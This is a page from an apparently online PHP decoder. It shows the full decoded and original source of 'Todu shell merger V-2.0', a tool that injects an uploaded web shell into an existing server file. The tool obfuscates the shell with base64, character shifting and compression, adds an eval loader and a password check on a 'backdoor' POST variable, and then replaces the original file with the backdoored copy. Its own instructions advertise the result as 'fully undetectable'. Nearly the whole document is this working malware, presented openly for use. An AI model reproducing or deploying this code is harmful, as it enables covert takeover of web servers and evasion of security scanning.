Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<html> <head><title>Shell Merger Version 2.0</title> <meta http-equiv="Content-Type" con..

Decoded Output download

<html> 
<head><title>Shell Merger Version 2.0</title> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<STYLE> 
/* CSS [Thanks to Mannu shell :) this comes from there :P] */  
body { 
font-family: Tahoma 
} 
tr { 
BORDER: dashed 1px #333; 
color: #FFF; 
} 
td { 
BORDER: dashed 1px #333; 
color: #FFF; 
} 
.table1 { 
BORDER: 0px Black; 
BACKGROUND-COLOR: Black; 
color: #FFF; 
} 
.td1 { 
BORDER: 0px; 
BORDER-COLOR: #333333; 
font: 7pt Verdana; 
color: Green; 
} 
.tr1 { 
BORDER: 0px; 
BORDER-COLOR: #333333; 
color: #FFF; 
} 
table { 
BORDER: dashed 1px #333; 
BORDER-COLOR: #333333; 
BACKGROUND-COLOR: Black; 
color: #FFF; 
} 
input { 
border			: dashed 1px; 
border-color		: #333; 
BACKGROUND-COLOR: Black; 
font: 8pt Verdana; 
color: Red; 
} 
select { 
BORDER-RIGHT:  Black 1px solid; 
BORDER-TOP:    #DF0000 1px solid; 
BORDER-LEFT:   #DF0000 1px solid; 
BORDER-BOTTOM: Black 1px solid; 
BORDER-color: #FFF; 
BACKGROUND-COLOR: Black; 
font: 8pt Verdana; 
color: Red; 
} 
submit { 
BORDER:  buttonhighlight 2px outset; 
BACKGROUND-COLOR: Black; 
width: 40%; 
color: white; 
} 
textarea { 
border			: dashed 1px #333; 
BACKGROUND-COLOR: Black; 
font: Fixedsys bold; 
color: #999; 
} 
BODY { 
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF 
margin: 1px; 
color: Red; 
background-color: Black; 
} 
.main { 
margin			: -287px 0px 0px -490px; 
BORDER: dashed 1px #333; 
BORDER-COLOR: #333333; 
} 
.tt { 
background-color: Black; 
} 
 
A:link { 
	COLOR: White; TEXT-DECORATION: none 
} 
A:visited { 
	COLOR: White; TEXT-DECORATION: none 
} 
A:hover { 
	color: Red; TEXT-DECORATION: none 
} 
A:active { 
	color: Red; TEXT-DECORATION: none 
} 
 
 
 
 
div.nav 
{ 
    margin-top:1px; 
    height:60px; 
    background-color: ; 
} 
div.nav ul 
{ 
    list-style: none; 
    padding: 4px; 
} 
div.nav li 
{ 
    float: left; 
    margin-right: 10px; 
    text-align:center; 
} 
</style> 
</head> 
<body> 
<center> 
<?php 
if(!isset($_POST['o'])) 
{ 
?> 
<table> 
<tr><td width=1000px> 
<center><h1><font color=silver>Todu shell merger V-2.0<br></font><font color=green>(FUD VERSION)</font></h1></center> 
<center><h3><font color=silver>By Sujit Ugale</font></h3></center> 
<marquee><font color=silver>Greetz to Manish Tanwar</font></marquee> 
<font size=2>Here are the steps to use this merger. 
<OL> 
<li>Enter local path of file to which ur shell is to be merged with. 
<li>Upload shell. 
<li>Select your password, which u'll use to access the merged shell. 
<li>Now hit the button. 
<li>To  access the shell, send POST variable <font color=grey>"backdoor=[your pass]"</font> to the merged file name. 
<li>enjoy your shell, which is now fully undetectable :)</ol></font> 
</td></tr> 
<tr><td width=1000px> 
<center> 
<br><br><br> 
<font color=red> 
<form enctype="multipart/form-data"  method="POST" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']);?>"> 
File path(local path)	: <input name="o" value=""><br><br> 
Shell (Upload it)		: <input name="userfile" type="file"><br><br> 
Password you want		: <input name="pass" type="password" value=""/><br><br> 
<input type="Submit" value="Merge it Babe!"><br><br> 
</form> 
</font> 
</td></tr> 
</table> 
<?php 
} 
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) 
{ 
	if(!file_exists($_POST['o'])){ 
	die("File to be merged with does not exist"); 
} 
$tempname="temp" . rand(100,1000); 
copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]);  
rename($_FILES["userfile"]["name"],$tempname); 
error_reporting(0); 
$file1=$tempname;//uploaded file(shell) 
$file2=$_POST['o'];//Original file to be backdoored 
$pass=md5($_POST['pass']); 
echo "Work done!!!"; 
//Apna main plan 
$tempdata= base64_decode("PD9waHAKc2Vzc2lvbl9zdGFydCgpOwplcnJvcl9yZXBvcnRpbmcoMCk7").base64_decode("JHM9IkFTc0IxUDU0bkUyUFNYS0RNQkJGcnlTR3hNWENLem1Ga1R3aERBanRqREFZQkVhT3ltRTRmUnF5eWFxcnBOL3Y5UmZQNUowNVRPZTJXd2svN3NuK3FQSFRVSmllY0xUT08yRXl6bHJxRjU5Rit0SGt0alhJTHBubDlLZ3pmbXBQRFN1Rm44QTdaRENiYWFUMGVlaFY3aVRvRWdYMWVkQmQ3Z1E5OFpWM2JHTHJQREY5YWRDd3pFT0VWaGVPMk9zU01VM25yeEYyeWVLV0RwdTRRMXJwajQvTWpudGd2MmcwTnJmOXl0S0h4WFUxdEF6LzhYZEczYTdqWE95SkVhbTdkbGs4ZEVZVERmVUdWNjBXZGFXa0E3bklqT1VWZVdSeW56VHN5UjI4Y01kUHdjTTMzRExmWWE4RVB1YUk0alF4MG82clc1b0I4N1FCMS9lUkl3LzZ0VUd0SUFPNVVLMmREdzM2NDNNRVBrV0k3MWtGZHIyZ0hkOUI4OGVEbXlmQm1TVTd0MXIvZDB1UDdmWVhiSnlIdEE9PSI7CmV2YWwoYmFzZTY0X2RlY29kZShnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJHMpKSkpKTsKaWYoaXNzZXQoJF9QT1NUWydiYWNrZG9vciddKSkKewoJaWYobWQ1KCRfUE9TVFsnYmFja2Rvb3InXSk9PSI=").$pass.base64_decode("IikKCXsKCQkkX1NFU1NJT05bJ2JkJ109MTsKCX0KfQppZihpc3NldCgkX1NFU1NJT05bJ2JkJ10pICYmICRfU0VTU0lPTlsnYmQnXT09MSkKew=="); 
file_put_contents('output.php', $tempdata); 
 
//*********************************File 1[backdoor]********************************// 
function en($ins) 
{ 
$in=file($ins); 
$out=""; 
foreach($in as $line) 
{ 
	for($i=0;$i<strlen($line);$i++) 
	{ 
		$out.=(ord($line{$i})+11); 
		if($i<strlen($line)-1) 
		$out.="."; 
	} 
	$out.="%"; 
} 
$k=base64_encode(gzcompress(gzdeflate($out))); 
return $k; 
} 
//*********************************File 1[backdoor]********************************// 
$tempdata=base64_decode("JGE9Ig==");//$a=" 
file_put_contents('output.php', $tempdata, FILE_APPEND); 
 
$tempdata=en($file1);//encoded code 
file_put_contents('output.php', $tempdata, FILE_APPEND);//main jugad 
 
$tempdata=base64_decode("Ijs=");// "; 
file_put_contents('output.php', $tempdata."
", FILE_APPEND); 
 
$tempdata=base64_decode("ZXZhbCgiPz4iLmRlKCRhKSk7");/*  eval("?>".de($a));   */ 
file_put_contents('output.php', $tempdata."
", FILE_APPEND);// put eval in output 
 
file_put_contents('output.php', "
?>
", FILE_APPEND); 
 
$tempdata=" 
<?php 
} 
else 
{ 
?> 
"; 
file_put_contents('output.php', $tempdata, FILE_APPEND); 
 
//************************************File 2[original]******************************// 
$reader=file($file2); 
foreach($reader as $line) 
{ 
	file_put_contents('output.php', $line, FILE_APPEND); 
} 
 
$tempdata=" 
<?php 
} 
?> 
"; 
file_put_contents('output.php', $tempdata, FILE_APPEND); 
 
//Now replace main file :D 
rename($_POST['o'],$_POST['o'].'.bak'); 
rename('output.php', $_POST['o']); 
unlink('output.php'); 
unlink($tempname); 
} 
?> 
</body> 
</html>

Did this file decode correctly?

Original Code

<html>
<head><title>Shell Merger Version 2.0</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
/* CSS [Thanks to Mannu shell :) this comes from there :P] */ 
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 40%;
color: white;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}




div.nav
{
    margin-top:1px;
    height:60px;
    background-color: ;
}
div.nav ul
{
    list-style: none;
    padding: 4px;
}
div.nav li
{
    float: left;
    margin-right: 10px;
    text-align:center;
}
</style>
</head>
<body>
<center>
<?php
if(!isset($_POST['o']))
{
?>
<table>
<tr><td width=1000px>
<center><h1><font color=silver>Todu shell merger V-2.0<br></font><font color=green>(FUD VERSION)</font></h1></center>
<center><h3><font color=silver>By Sujit Ugale</font></h3></center>
<marquee><font color=silver>Greetz to Manish Tanwar</font></marquee>
<font size=2>Here are the steps to use this merger.
<OL>
<li>Enter local path of file to which ur shell is to be merged with.
<li>Upload shell.
<li>Select your password, which u'll use to access the merged shell.
<li>Now hit the button.
<li>To  access the shell, send POST variable <font color=grey>"backdoor=[your pass]"</font> to the merged file name.
<li>enjoy your shell, which is now fully undetectable :)</ol></font>
</td></tr>
<tr><td width=1000px>
<center>
<br><br><br>
<font color=red>
<form enctype="multipart/form-data"  method="POST" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']);?>">
File path(local path)	: <input name="o" value=""><br><br>
Shell (Upload it)		: <input name="userfile" type="file"><br><br>
Password you want		: <input name="pass" type="password" value=""/><br><br>
<input type="Submit" value="Merge it Babe!"><br><br>
</form>
</font>
</td></tr>
</table>
<?php
}
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"]))
{
	if(!file_exists($_POST['o'])){
	die("File to be merged with does not exist");
}
$tempname="temp" . rand(100,1000);
copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]); 
rename($_FILES["userfile"]["name"],$tempname);
error_reporting(0);
$file1=$tempname;//uploaded file(shell)
$file2=$_POST['o'];//Original file to be backdoored
$pass=md5($_POST['pass']);
echo "Work done!!!";
//Apna main plan
$tempdata= base64_decode("PD9waHAKc2Vzc2lvbl9zdGFydCgpOwplcnJvcl9yZXBvcnRpbmcoMCk7").base64_decode("JHM9IkFTc0IxUDU0bkUyUFNYS0RNQkJGcnlTR3hNWENLem1Ga1R3aERBanRqREFZQkVhT3ltRTRmUnF5eWFxcnBOL3Y5UmZQNUowNVRPZTJXd2svN3NuK3FQSFRVSmllY0xUT08yRXl6bHJxRjU5Rit0SGt0alhJTHBubDlLZ3pmbXBQRFN1Rm44QTdaRENiYWFUMGVlaFY3aVRvRWdYMWVkQmQ3Z1E5OFpWM2JHTHJQREY5YWRDd3pFT0VWaGVPMk9zU01VM25yeEYyeWVLV0RwdTRRMXJwajQvTWpudGd2MmcwTnJmOXl0S0h4WFUxdEF6LzhYZEczYTdqWE95SkVhbTdkbGs4ZEVZVERmVUdWNjBXZGFXa0E3bklqT1VWZVdSeW56VHN5UjI4Y01kUHdjTTMzRExmWWE4RVB1YUk0alF4MG82clc1b0I4N1FCMS9lUkl3LzZ0VUd0SUFPNVVLMmREdzM2NDNNRVBrV0k3MWtGZHIyZ0hkOUI4OGVEbXlmQm1TVTd0MXIvZDB1UDdmWVhiSnlIdEE9PSI7CmV2YWwoYmFzZTY0X2RlY29kZShnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJHMpKSkpKTsKaWYoaXNzZXQoJF9QT1NUWydiYWNrZG9vciddKSkKewoJaWYobWQ1KCRfUE9TVFsnYmFja2Rvb3InXSk9PSI=").$pass.base64_decode("IikKCXsKCQkkX1NFU1NJT05bJ2JkJ109MTsKCX0KfQppZihpc3NldCgkX1NFU1NJT05bJ2JkJ10pICYmICRfU0VTU0lPTlsnYmQnXT09MSkKew==");
file_put_contents('output.php', $tempdata);

//*********************************File 1[backdoor]********************************//
function en($ins)
{
$in=file($ins);
$out="";
foreach($in as $line)
{
	for($i=0;$i<strlen($line);$i++)
	{
		$out.=(ord($line{$i})+11);
		if($i<strlen($line)-1)
		$out.=".";
	}
	$out.="%";
}
$k=base64_encode(gzcompress(gzdeflate($out)));
return $k;
}
//*********************************File 1[backdoor]********************************//
$tempdata=base64_decode("JGE9Ig==");//$a="
file_put_contents('output.php', $tempdata, FILE_APPEND);

$tempdata=en($file1);//encoded code
file_put_contents('output.php', $tempdata, FILE_APPEND);//main jugad

$tempdata=base64_decode("Ijs=");// ";
file_put_contents('output.php', $tempdata."\n", FILE_APPEND);

$tempdata=base64_decode("ZXZhbCgiPz4iLmRlKCRhKSk7");/*  eval("?>".de($a));   */
file_put_contents('output.php', $tempdata."\n", FILE_APPEND);// put eval in output

file_put_contents('output.php', "\n?>\n", FILE_APPEND);

$tempdata="
<?php
}
else
{
?>
";
file_put_contents('output.php', $tempdata, FILE_APPEND);

//************************************File 2[original]******************************//
$reader=file($file2);
foreach($reader as $line)
{
	file_put_contents('output.php', $line, FILE_APPEND);
}

$tempdata="
<?php
}
?>
";
file_put_contents('output.php', $tempdata, FILE_APPEND);

//Now replace main file :D
rename($_POST['o'],$_POST['o'].'.bak');
rename('output.php', $_POST['o']);
unlink('output.php');
unlink($tempname);
}
?>
</body>
</html>

Function Calls

htmlspecialchars 1

Variables

None

Stats

MD5 bcdf5842f6dbbc331004c737d46e6ad0
Eval Count 0
Decode Time 122 ms